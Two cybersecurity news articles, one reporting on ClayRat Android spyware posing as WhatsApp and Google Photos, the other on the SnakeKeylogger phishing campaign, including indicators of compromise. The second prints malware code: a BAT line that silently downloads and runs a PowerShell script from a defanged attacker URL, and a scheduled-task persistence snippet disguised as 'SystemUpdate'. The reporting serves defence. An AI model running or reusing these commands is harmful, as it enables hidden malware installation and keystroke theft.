A sophisticated Android spyware campaign dubbed ClayRat has emerged as one of the most concerning mobile threats of 2025, masquerading as popular applications including WhatsApp, Google Photos, TikTok, and YouTube to infiltrate devices and steal sensitive user data.

The malware demonstrates remarkable adaptability and persistence, with threat actors continuously evolving their tactics to bypass security measures and expand their reach across targeted regions.

ClayRat operates as a comprehensive surveillance tool capable of exfiltrating SMS messages, call logs, device notifications, and personal information while maintaining covert access to infected devices.

The spyware’s most alarming capability lies in its ability to capture photographs using the front-facing camera and weaponize the victim’s contact list by automatically sending malicious links to every saved contact, effectively transforming each compromised device into a distribution hub for further infections.

The campaign has demonstrated explosive growth over recent months, with security researchers documenting over 600 malware samples and 50 dropper variants within a three-month period.

Each iteration introduces new layers of obfuscation and packing techniques designed to evade detection systems, showcasing the operators’ commitment to maintaining persistence against evolving security defenses.

Zimperium analysts identified the malware’s sophisticated distribution network, which primarily leverages Telegram channels and carefully crafted phishing websites that closely mimic legitimate service pages.

The attackers have registered domains that impersonate well-known services, creating convincing landing pages that redirect victims to Telegram channels where malicious APK files are hosted with accompanying installation instructions designed to bypass Android’s built-in security warnings.

Advanced Infection and Persistence Mechanisms

ClayRat employs several sophisticated techniques to establish persistent access on target devices, with its most effective strategy involving the abuse of Android’s default SMS handler role.

This privileged system role grants the malware extensive access to messaging functions without triggering standard runtime permission prompts, allowing it to read, store, and forward text messages at scale while remaining largely undetected by users.

The spyware utilizes session-based installation methods specifically designed to circumvent Android 13’s enhanced security restrictions.

Dropper variants present fake Google Play Store update screens to victims, displaying familiar installation interfaces while secretly deploying encrypted payloads stored within the application’s assets.

This approach significantly reduces user suspicion and increases installation success rates by mimicking legitimate system update procedures.

Once successfully installed and granted SMS handler privileges, ClayRat immediately begins its surveillance operations by capturing photographs using the device’s front-facing camera and uploading them to command-and-control servers.

The malware supports an extensive range of remote commands including application enumeration, call log exfiltration, notification theft, and unauthorized SMS transmission from the victim’s device.

Communication with command-and-control infrastructure occurs through standard HTTP protocols, with the malware implementing Base64 encoding combined with marker strings such as “apezdolskynet” to obfuscate traffic patterns.

Advanced variants employ AES-GCM encryption for secure communications while utilizing dynamic payload loading from encrypted assets to further complicate analysis and detection efforts.

The malware’s self-propagation mechanism represents its most dangerous feature, automatically composing and transmitting malicious links to every contact in the victim’s phonebook, creating an exponential infection pattern that exploits social trust relationships for rapid campaign expansion.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post New Android Malware ClayRat Mimic as WhatsApp, Google Photos to Attack Users appeared first on Cyber Security News.

Emerging from a recent wave of targeted campaigns, SnakeKeylogger has surfaced as a potent infostealer that capitalizes on PowerShell and social engineering.

The malware’s operators craft convincing spear-phishing e-mails under aliases such as “CPA-Payment Files,” impersonating reputable financial and research firms.

Recipients encounter ISO or ZIP attachments containing a seemingly innocuous BAT script. Once executed, this script downloads and launches a PowerShell payload designed to harvest keystrokes and system information before exfiltrating data to a remote server.

Gen Threat Labs analysts noted the malware’s seamless blend of legitimate Windows utilities and custom scripting for stealth and rapid deployment.

After opening the attachment, victims unwittingly activate a BAT file resembling the following snippet:

@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "& {iwr hxxp://fxa.sabitaxt.com/mc55tP.ps1 -OutFile %TEMP%\snake.ps1; Start-Process powershell -ArgumentList '-NoP -NonI -W Hidden -Exec Bypass -File %TEMP%\snake.ps1'}"

This approach bypasses standard execution policies and conceals visible windows, allowing SnakeKeylogger to operate without raising suspicion.

The PowerShell script, once loaded, establishes persistence by creating scheduled tasks and registry entries, ensuring the malware survives reboots and avoids cursory incident response efforts.

Beyond initial delivery, SnakeKeylogger’s impact lies in its minimalist but efficient data collection routines. Upon activation, the script invokes Windows API functions to capture keystrokes, clipboard contents, and active window titles.

Collected information is batched and encoded before transmission to a command-and-control server.

Observed IoCs include BAT payload SHA256 hashes such as 3796e68... and the PowerShell script URL hxxp://fxa[.]sabitaxt[.]com/mc55tP.ps1, indicative of the ongoing campaign.

Infection Mechanism

SnakeKeylogger’s infection chain hinges on its two-stage loader. The initial BAT script exploits PowerShell’s unrestricted execution to retrieve the core keylogger module.

Within the PowerShell payload, the Add-Type cmdlet compiles C# code on the fly, injecting functions such as GetAsyncKeyState for low-level keystroke interception.

Persistence is achieved via a scheduled task entry resembling:-

$Action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-WindowStyle Hidden -File C:\Windows\Temp\snake.ps1'
Register-ScheduledTask -TaskName 'SystemUpdate' -Action $Action -Trigger (New-ScheduledTaskTrigger -AtLogon) -RunLevel Highest

This tactic not only reinstates the keylogger at each user login but also blends into legitimate Windows maintenance processes, complicating detection. Continuous monitoring and timely updates to endpoint protection policies are recommended to counteract this evolving threat.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post SnakeKeylogger via Weaponized E-mails Leverage PowerShell to Exfiltrate Sensitive Data appeared first on Cyber Security News.